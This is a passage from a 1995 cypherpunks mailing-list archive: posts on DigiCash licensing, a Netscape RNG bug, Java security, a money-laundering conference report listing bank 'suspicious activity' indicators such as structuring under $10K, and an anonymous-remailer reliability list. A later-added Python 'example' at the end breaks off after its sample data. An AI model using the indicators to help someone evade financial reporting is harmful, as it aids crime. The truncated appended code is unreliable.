		  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> depends on the application, business potential etc.
  			      ^^^^^^^^^^^^^^^^^^^^^^

ie laying your plans out up front, plans which don't exist!  Business
potential is not predictable, even obtaining appropriate status, and
banking licenses would presumably be doubtful unless a concerted,
organised effort were put together.  Requiring business plans rules
out experimenting.  The freeware mosaic browsers growth while being
developed by academia, and the WWW in general seems to be a model
which works rather well for the internet, if the netscape success
story is anything to go by.  

Internet payment is rather harder to set up as a small experimental
operation due to the legal and political implications, but a *real*
example by Digicash would be nice.  As in: if no licensing banks for
digicash can be found, perhaps it would be a good approach for
digicash to do it themselves, and support an official exchange
mechanism, if such a mechanism took off, banks might be interested to
buy into an existing client base.

On the $150k + 10% figures, my apologies, I picked them up from
earlier posts on ecm I think, and had assumed incorrectly that this
was a fixed price.

> The up-front patent price should never be an obstacle for setting up
> business. If you wanna do serious business, I suggest to give David
> Chaum a call, or call Dan Eldridge. Phone numbers and email addresses
> can be found on our web pages. You might be surprised.

I am tempted to say: "how about free for a good cause :-)"

And it might (theoretically) be nice as an analogue of the
relationship between PGP and RSA with PGP's current free non-commercial
use license from RSA, that seems to have helped RSA quite a lot.  RSA
are fond of quoting statistics about the world wide usage of their
algorithms, one rather suspects that PGP is included and a major
contributor to their figures :-)

However, being realistic, I expect the answer to be no.  I can
understand this, but IMO it is still not a good situation from the
point of view of advancing technology.

My point however, is let's see a digicash payment system with a real
exchange and soon!  I don't care who does it so long as it gets done!

> And may I remind you that the patent price that is quoted is just a
> tiny drop in the bucket compared to the kind of money spent on
> marketing budgets for systems like Mondex!!! You are really talking
> about a non-issue here, IMHO.

True enough.  The 10% is likely more of a sticking point tho, but as
you say this is all negotiable.  But hey, I don't have a high powered
business plan, I'm just a little cypherpunk be-moaning the fact that
there are no digicash licensing banks which I can use to take
advantage of Chaum's privacy technology, and instant on-line buying.

Just think how much hassle could be saved when buying the perl rsa
T-shirts even (no, I promise no more shirts arguments, I'm talking of
payment!), all the foreign cheques, the hugely exorbitant charges
banks charge for writing small value foreign currency cheques, the
risks (and dubious technical legality in some places) of posting paper
cash in the mail, and the odd postal order which the bank would like
to charge more than the face value to cash (I kid you not, I asked a
few people to send different payment forms).

"Click here to buy" would be infinitely better.

The market is impatient, and inferior, non-privacy preserving payment
forms are in danger of soon becoming entrenched as standard internet
payment methods.

Digicash has or soon will have MSN money systems to compete with.

Digicash now!

Adam
--
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Sun, 8 Oct 95 18:27:56 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Certification Authorities in history.
In-Reply-To: <199510080718.AAA02155@ix5.ix.netcom.com>
Message-ID: <Pine.D-G.3.91.951008213248.3807B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Oct 1995, Bill Stewart wrote:

> Timothy C. May (or somebody like him, or Tim the Enchanted) wrote:
> >> The talk of certification authorities is OK, so long as the practice is
> >> _completely_  and "strongly" voluntary (*).
> 
> It occurred to me that the authors of the US Constitution had 
> direct experience with the equivalent of mandatory certification hierarchies
> for legally acceptable digital signatures.
> 
> They called it "The Stamp Act".  
> 
> If you wanted to make a legal document, such as a contract or will, 
> it needed to be on paper with a tax stamp on it; I forget if this was
> a watermark or a stick-on stamp, but you could only get it from the authorities.
> 
> They didn't like it.  There was also a few-percent sales tax on tea around
> that time.  They didn't like that either :-)

But their principal reason for disliking it was "Taxation without 
representation."  Today, you get to vote on those who decide on taxes, 
unlike the colonists ....

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an402976@anon.penet.fi (RingZero)
Date: Sun, 8 Oct 95 14:45:48 PDT
To: cypherpunks@toad.com
Subject: Re: NEW Netscape RNG hole
Message-ID: <9510082136.AA03945@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain




Phil argues this file handle being lost isn't a big mistake.
He describes how the function is actually called, which
does indeed show that it shouldn't be much of a problem.
However, Netscape had not revealed enough information about
their RNG to allow myself or other reviewers to determine how
critical it was. If, for example, this seeding function were
called once every time a secure connection were established,
losing a handle would be a major problem.

This seems like a good reason to ask for the code for
SEC_RandomUpdate(). You show us from what sources you gather bits,
but you don't show us how you mix them or, for that matter,
stream out "random" bits.

If you did have a description in your original published code
that was better than "mixing is accomplished with MD5", I
must've missed it.


RingZero

===========
From: Phil Karlton  <karlton@netscape.com>
Subject: Re: NEW Netscape RNG hole
Date: Sunday, October 08, 1995 1:39AM

RingZero wrote:
>
> Did anyone else notice a bug in the new, public Netscape
> RNG code? It appears that on Windows builds, during the
> RNG seeding, the function that hashes in file contents
> (EnumSystemFiles) doesn't close a file handle (lFileHandle).

I think you mean lFindHandle. I'm not a windows programmer, so I have
no idea if the enumerator needs to be cleaned up, but I will forward
your message to the appropriate folks here.

[...]

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 8 Oct 95 20:23:20 PDT
To: austin-cpunks@einstein.ssz.com (Austin Cypherpunks)
Subject: Nov. meeting: Austin, Tx
Message-ID: <199510090319.WAA00817@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

The next meeting of the Austin Cypherpunks will be on Nov. 7 from 6-8pm at
Ted's Greek Restaurant on Congress at 4th. near Oscar Snowden. We will be
meeting in the rear.

The get together yesterday was pretty well attended with 5 people as well as
Strick from the California cpunks.

Thanks to those who attended and hope to see more of those who didn't at the
next meeting.

                                           Jim Choate
                                           CyberTects
                                           ravage@einstein.ssz.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Sun, 8 Oct 95 19:12:10 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certification Authorities in history.
In-Reply-To: <199510081726.KAA10621@jobe.shell.portal.com>
Message-ID: <Pine.D-G.3.91.951008221847.4800A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Oct 1995, Hal wrote:

> One key to rule them all;
> One key to find them;
> One key to bring them all
> And in the darkness bind them.

In the land of Langley, where the shadows lie.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 8 Oct 95 22:24:48 PDT
To: cypherpunks@toad.com
Subject: Conference Summary, Part the First
Message-ID: <v02120d07ac9e557bab94@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain




INTRODUCTION

As you may know, I attended the Fourth International conference
on Money Laundering, Forfeiture, Asset Recovery, Offshore Investments,
the Pacific Rim and International Financial Crimes last week. I
will be dribbling my trip report out over the next week.

The conference was attended primarily by lawyers, bank "compliance
officers", law enforcement personnel and federal regulators. There
were several main themes through the conference:

  o How existing and soon-to-exist regulations affect banks and
    NBFIs (Non-bank financial institutions) with respect to money
    laundering.

  o How the US is projecting its notions of fiscal propriety around
    the globe.

  o Scary stories about things bad people do.

There were also a few bits that prevented it from being a complete
pro-law-enforcement rally, including an interesting bit on foreign
asset protection trusts and a single speaker who dared to suggest that
if we stopped treating drugs as a law enforcement problem, perhaps we
wouldn't have such a serious problem with money laundering. There was
also the bizarre substitution of a marketroid from First Virtual for one
of the speakers.

Despite this somewhat bleak description, it was extremely educational,
and, I think quite useful -- the utility coming not so much from the
explicit content, but rather from the subtext of the talks, the
interactions between the different parties, the hallway conversations,
and the vast tracts of ignorance with respect to cyberspace that were
displayed (and, to be honest, openly admitted) in some of the talks.

Some quick morsels of interest:

  o Regulators are not amused by attempts to run unlicensed online
    banks. They are aware such things are starting to pop up, and
    they are very interested in shutting them down when they do.

  o The same goes for NBFIs (Non-bank financial institutions) --
    these appear to be regulated primarily at the state level, with
    some IRS and FinCEN involvement. These include everyone from
    stock brokers to Casas de Cambio. (I shared a table with a lawyer
    from Chula Vista who represents some of these guys -- he had a
    wonderful sense of humor and we began to worry we'd get chucked
    out for laughing at the wrong parts of the presentations.)

  o The attendees displayed an understanding of the situation wrt
    electronic payment systems that ran from dim to non-existent. A
    surprisingly large number of them had heard of David Chaum, who
    apparently has been hob-nobbing with them a bit. I don't think
    much of what he's said has sunk in, beyond some acquisition of
    the notion that non-anonymous systems can pose privacy problems.


THE _REALLY_ SCARY PART
New Regulations Coming, Old Regulations Reinterpreted

Recent legislation and regulation on money laundering is moving
in the following direction:

  o Fewer formal, specific or deterministic rules for reporting
    suspicious transactions.

  o More vague, subjective, and privacy-invading rules for
    reporting suspicious transactions, coupled with more severe
    penalties for banks and NBFIs.

More specifically ("bank" includes NBFIs):

  o Banks are now considered "deputies" of the federal government
    in the War On Money Laundering.
  o Banks have an affirmative duty to use their resources to seek
    out and report on suspicious activity.
  o Banks must implement strict "Know Your Customer" policies.
  o If money launderers are found to be using a bank, a bank
    can be closed down (Under Annunzio-Wylie "death penalty"
    provisions); penalties are mitigated if:

    o Senior officers are aware of and pushing for compliance
      with m.l. regulations.
    o Bank has strong controls that were thwarted in a new or
      unusual way.
    o Bank cooperated (and has a history of cooperating with)
      Law Enforcement Agencies, including appropriate filing
      of Currency Transaction Reports (CTRs), Suspicious Activity
      Reports (SARs) and Criminal Referral Forms (CRFs).
    o Bank instituted new controls after m.l. incident.
    o Removal of bank would harm community.

The primary representative of the regulators, Dan Sato, made it
very clear that it was not the government's job to define
"suspicious" behavior, but that this was up to the banks. This
has the effect of causing the banks to implement far more
restrictive and invasive policies than the government could ever
explicitly mandate.

Those of you who have recently experienced new account paranoia
at banks should take note -- it's going to get much, much worse.
Current compliance measures being used or proposed for use by the
industry itself include:

 o Increased ID requirements for new accounts, including bank
   references, follow-up investigation, flagging of mail-drop
   addresses, etc. One attendee described some software to detect
   new account fraud in glowing terms.

 o Use of transaction profiling to detect unusual patterns; use of
   AI at banks to turn them into mini-FinCENs.

 o Pre-loading transaction profiling with a detailed questionnaire
   given to customers when account is opened: "Do you plan to make
   any large cash transactions?", "Do you plan to send or receive
   any wire transfers?" -- answers trigger further investigation
   and documentation of the customer's reason for using these services.

Note that equivalent measures and software are enthusiastically
embraced by the people involved in NBFIs, including a
representative of a large money transmitter I spoke with.

Most of the discussions on the subject of bank regulation wrt
money laundering featured some input from John Byrne, a lobbyist
for the American Banker's Association, and, for reasons which
are clear, "the first private sector recipient of FinCEN's
Director's Medal for Exceptional Service." Mr. Byrne continued to
provide exceptional service for the government throughout the
conference, a model of government-industry cooperation.

It is important for people not involved in the banking industry
to realize that it is very tightly regulated, with a good deal of
highly subjective latitude given to bank examiners. There is
very little due process available to banks wrt the judgements made
by examiners, and banks wisely do whatever they can to avoid
irritating the government. The alternative is higher fines and
less benefit of the doubt when they inevitably screw up and
violate one of the yards of regulations affecting them. [I am
continuing to research how control is extended to NBFIs.]

This enthusiastic compliance is not too surprising. In
fact, one of the recurring complaints from the bankers was that
over the years they had dutifully filed Suspicious Activity Reports
and Criminal Activity Forms and nothing ever happened; as a reward
for their concerns, they now have an affirmative duty to follow
up on these forms if they don't hear back from an appropriate LEA.
(Failure to follow up is now considered a form of willful blindness.)

And finally, for your entertainment and edification, here are some
examples of "suspicious behavior", generally:

o Insufficient, false, or suspicious information provided by
  the customer.

o Cash deposits, purchase and/or deposits of monetary instruments,
  or wire transfers which are not consistent with the business activities
  of the customer. (Ponder for a bit how closely a bank has to understand
  you and your business to make this determination.)

o Structuring of transactions to avoid reporting requirements (a
  running joke in the conference was that a $9,500 cash transaction
  is far more suspicious than a $24,000 one.)

o Funds transfer to foreign countries.

More specifically:

o Customer is reluctant to provide information requested for
  proper identification.

o Customer opens a number of accounts under one or more names and
  subsequently makes deposits of less than $10K in one or more of them.

o Customer is reluctant to proceed with transaction after being
  informed that a CTR will be filed.

o Customer makes frequent deposits or withdrawals for no apparent
  business reason, or for a business which generally does not involve
  large amounts of cash. (Again, ponder the process of determining
  this.)

o Customer exchanges large amounts of currency from small to large
  denomination bills.

o Customer makes frequent purchases of monetary instruments for cash
  in amounts less than $10K.

o Customers who enter the bank simultaneously and each conduct a large
  currency transaction under $10K with different tellers.

o Customer who makes constant deposits of funds into an account and
  almost immediately requests wire transfers to another city or
  country, and that activity is inconsistent with the customer's
  stated business.

o Customer who receives wire transfers and immediately purchases
  monetary instruments for payment to another party.

o Traffic patterns of a customer change in the safe deposit box
  area possibly indicating the safekeeping of large amounts of cash.

o Customer discusses CTR requirements with apparent intention of
  avoiding those requirements or makes threats to an employee to deter
  the filing of a CTR.

o Customer's wire traffic increases, esp. if international

o Customer receives many small incoming wire transfers or deposits
  of checks and money orders then requests wire transfers to another
  city or country.

o Large wire transfers less than $10K to nonaccountholders, esp.
  in conjunction with purchase of monetary instruments.

o Customer's stated purpose for a loan does not make economic sense,
  or customer proposes cash collateral for a loan while refusing to
  disclose the purpose of a loan.

o Requests for loans to offshore companies, or loans secured by the
  obligations of offshore banks.

o Borrower pays down a large problem loan suddenly, with no reasonable
  explanation of the source of funds.

o Customer purchases CDs and uses them as collateral, or uses any
  cash collateral for a loan.

o Loan proceeds are unexpectedly channeled off-shore.

[More to come.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 8 Oct 95 20:07:35 PDT
To: perry@piermont.com
Subject: Re: Java
In-Reply-To: <199510090017.UAA00652@jekyll.piermont.com>
Message-ID: <199510090307.XAA10293@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Well those concerns are all fine and swell, but the same kind
of reasoning applies to any network application. There are buffer overflow
bugs in almost every web browser, there are overflow bugs in CERN HTTPD3.0,
and who knows, there are probably bugs in ELM/PINE. Millions of people
download software from the internet without seeing the source code
every day and risk getting hit by trojan horses and viruses. People
make all kinds of transactions every day where they rely on nothing more
than trust. (and a future tit-for-tat legal suit if possible) I am of
the opinion that risk is good. Java will not be perfect. There will
be holes, I'm sure of it. And each generation of web languages will be
more efficient and more secure, but none will ever be perfect. It's all
part of evolution. It's a problem that will be researched and
improved on, but you've got to break some eggs to make a cake
somewhere. 

  And the situation without Java is not much better. Most of Java 
functionality is faked with CGI scripts, usually written in perl,
and there are plenty of ways to screw up a CGI implementation to allow
holes.

  As I mentioned before, Java file i/o is not built into the language.
It is provided through a Java class you can use that implements native C code
methods. This is where the write restrictions are handled. All that is
needed to remove the ability to do file i/o is to delete this class
from your installation. It's like having C, but no standard library.

  Java is mostly a risk to consumers (the users with the browsers), and
not corporate networks who are running servers, *unless* the employees
are using Java on the firewalled network. 

  Java is a lot better than the situation with Microsoft Network, whereby
a user can send you a 386 executable, and it shows up with an icon
saying "click me" on your desktop, and clicking on it will run it.

-Ray






 
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 8 Oct 95 23:11:26 PDT
To: schampeo@imonics.com
Subject: Re: Netscape 2.0 beta
Message-ID: <9510090607.AA02381@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Steven Champeon said:

> One thing that I found with the newsreader was that it doesn't
> do POP correctly. No matter what you do with your mail, it still
> doesn't check for read vs. unread articles. This is fine when you
> have a mailbox with one message. It can be annoying when you have
> 110 messages in your mailbox and don't want to 1) delete them or
> 2) download them twice.

Neither pop 2 nor pop 3 tell you whether you've read a message or not.
pop 2 does bump up the current number with an ACKS, but if you move around
with READ n, then that's useless.  pop 3 doesn't do that.

I just reread the rfcs to make sure that I wasn't missing anything,
(RFC 1725: Post Office Protocol - Version 3, RFC 937: Post Office Protocol -
Version 2).  Am I missing something?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 8 Oct 95 20:25:57 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Java
In-Reply-To: <199510090307.XAA10293@clark.net>
Message-ID: <199510090325.XAA04766@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
>   Well those concerns are all fine and swell, but the same kind
> of reasoning applies to any network application. There are buffer overflow
> bugs in almost every web browser, there are overflow bugs in CERN HTTPD3.0,
> and who knows, there are probably bugs in ELM/PINE.

I believe that the security related ones in those applications are
well within human ability to fix -- simply implementing some hygienic
coding practices stops them. I don't believe that is the case with
Java implementations. I don't know how I'd manage to produce a "safe"
Java. It's a neat programming language, by the way -- it's only when you
rig yourself to automatically run code produced by hostile people that
the issue comes up.

>   And the situation without Java is not much better. Most of Java 
> functionality is faked with CGI scripts, usually written in perl,
> and there are plenty of ways to screw up a CGI implementation to allow
> holes.

That's true, but again, there is the alternative of gaining the
functionality with truly safe languages.

>   Java is mostly a risk to consumers (the users with the browsers), and
> not corporate networks who are running servers, *unless* the employees
> are using Java on the firewalled network. 

Unfortunately, it will be very hard to stop people from doing just
that.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sun, 8 Oct 95 18:13:41 PDT
Subject: Re: The Ultimate GUK[TM] (Globally Unique Key) Biotech Racket
In-Reply-To: <199510090009.UAA19196@array1.arraydev.com>
Message-ID: <1995Oct9.011154.26189@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


Nahum.Goldmann@ARRAYdev.com (Nahum Goldmann) writes:

>No problem.  The ultimate way to ensure that keys are globally unique is to
>link them to the person's own genetic code.  Fingers they might cut, but...

Two words: identical twins.

Two more words: gene therapy.

The first generates non-unique keys, the second makes the code modifiable.
-- 
"For the last five years, the number of machines on the network has been
rising between five and 10 times faster than the number of transistors
on a chip."  `THE COMING SOFTWARE SHIFT' by George Gilder, Forbes, 8/8/95




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 9 Oct 95 00:12:28 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Netscape 2.0 beta
In-Reply-To: <9510090607.AA02381@cantina.verity.com>
Message-ID: <199510090712.DAA06375@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Netscape should be supporting IMAP instead of POP. POP has a tendency
to hose your mailbox and lose mail every once in awhile.

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stu@nemesis (Stuart Smith)
Date: Mon, 9 Oct 95 04:22:24 PDT
To: fair@clock.org
Subject: Re: Rethinking the utility of netnews "cancel" control messages
In-Reply-To: <v02110105ac99c03922dd@[204.179.132.4]>
Message-ID: <m0t2Ffg-0000VgC@nemesis>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02110105ac99c03922dd@[204.179.132.4]> you write:
>The downsides of having the mechanism (especially unauthenticated) we see
>now: official and unofficial squelching of articles that someone doesn't
>like for whatever arbitrary or situational reason.

You miss an important point in the mechanism - individual sites *choose*
whether or not to pay any attention to cancels.  Theoretically, they could
be configured to only listen to cancels from certain places etc etc.  By all
means these should be authenticated, but it is vital to remember that this
is still (for now..) an anarchy.  I don't have to honour anyone's cancels,
and if I do, and you don't like it - you don't have to get a news feed from
me.

- --
 Baba baby mama shaggy papa baba bro baba rock a shaggy baba sister
shag saggy hey doc baba baby shaggy hey baba can you dig it baba baba
E7 E3 90 7E 16 2E F3 45  *   Stuart Smith  *  28 24 2E C6 03 02 37 5C 
     <stu@nemesis.wimsey.com>  *  http://www.wimsey.com/~ssmith/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHj8pqi5iP4JtEWBAQHI+QP/dy3e6AfQ4OjRLjM723i8ZBCGSJdN7N8i
Iw6E+UwhkZxt5aEq6KQHr72TkGbz6wgUMOCFsdK0cJjpt3ubgi1RYjDiQPeYswkp
zK6/hnUnbpKAUE7h2BWLO+VYyoxxySCydigUthxWrG3p25eDJTYVhAw5gKsLrOJp
k/HDHNQ2IG8=
=ZBAz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 9 Oct 95 03:44:46 PDT
To: cypherpunks@toad.com
Subject: The problem with Java
Message-ID: <9510091042.AA13473@all.net>
MIME-Version: 1.0
Content-Type: text


The way I see it, the real problem with Java is that there is no
clear statement of the "security" goals it is supposed to attain.
It's one thing to declare a concept or an implementation "secure"
but it's quite another to tell us what the security claims are and
demonstrate that they are met.  Specifically:

	Do the makers of Java claim it can authenticate the
	source of programs it runs?

	Do the makers of Java claim it can prevent someone from using
	your client to attack other servers?

	Do the makers of Java claim it can prevent denial of services or
	consumption of all available resources on the client machine?

	Do the makers of Java claim it can maintain integrity or
	confidentiality of something?

I have read the white paper on Java and I still don't know the answer to
these questions.  Until I do, it's hard to assess the "security" of
Java, but I can tell you this.  I bet that at least two, probably three,
and maybe even all four of these are not accomplished by Java. 

-- 
-> See: Info-Sec Heaven at URL http://all.net Management Analytics -
216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 9 Oct 95 06:50:39 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199510091350.GAA12733@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk";
$remailer{"wmono"} = "<wmono@spook.alias.net> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ecafe    remail@ecafe.org                 *******#--**    30:29  99.96%
portal   hfinney@shell.portal.com         +#*##**#-###     4:12  99.95%
ideath   remailer@ideath.goldenbear.com   .---.----.-   8:14:14  99.94%
flame    remailer@flame.alias.net         **+**+++-**+    28:29  99.93%
extropia remail@extropia.wimsey.com       -------..--   8:34:49  99.79%
alumni   hal@alumni.caltech.edu           +#*##** -**#     4:44  99.79%
vishnu   mixmaster@vishnu.alias.net       + +***+*-+**    15:35  99.77%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***-##* -#+#    12:48  99.77%
mix      mixmaster@remail.obscura.com     ---+ +-+--+   1:03:29  99.65%
replay   remailer@replay.com              +*++***+-**     13:22  99.43%
hacktic  remailer@utopia.hacktic.nl       **+** *+-**     14:31  99.38%
rmadillo remailer@armadillo.com           + ++  ++-+-     59:29  99.16%
penet    anon@anon.penet.fi               --++ ---- ++  3:15:48  98.47%
wmono    wmono@spook.alias.net             ****++*-+ *    14:26  98.12%
spook    remailer@spook.alias.net         ---- +++- +*  1:19:36  94.96%
rahul    homer@rahul.net                  +### #+  # +     4:11  98.84%
robo     robo@c2.org                      +#*#### -#      24:26  80.99%
c2       remail@c2.org                    + +++-++-+      54:15  76.59%
syrinx   syrinx@c2.org                    ----+-++-+      48:35  75.76%
crown    mixmaster@kether.alias.net       +-+---++      1:03:56  59.66%
gondolin mixmaster@gondolin.org           +*--+ +       1:19:10  44.00%
ford     remailer@bi-node.zerberus.de     *+               6:37  10.73%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
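
An added example (not part of the message above and not premail's own code): a Python parser for the two parts of the listing, the `$remailer{...}` capability lines and the history/latency/uptime table, that picks remailers by capability keyword and measured uptime. The function names, the 99% threshold, and the reading of the latency column as [h:]mm:ss are assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Excerpt copied from the listing above: capability lines, then stats rows.
SAMPLE = r'''
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
catalyst@netcom.com is _not_ a remailer.

portal   hfinney@shell.portal.com         +#*##**#-###     4:12  99.95%
flame    remailer@flame.alias.net         **+**+++-**+    28:29  99.93%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***-##* -#+#    12:48  99.77%
rahul    homer@rahul.net                  +### #+  # +     4:11  98.84%
c2       remail@c2.org                    + +++-++-+      54:15  76.59%
ford     remailer@bi-node.zerberus.de     *+               6:37  10.73%
'''

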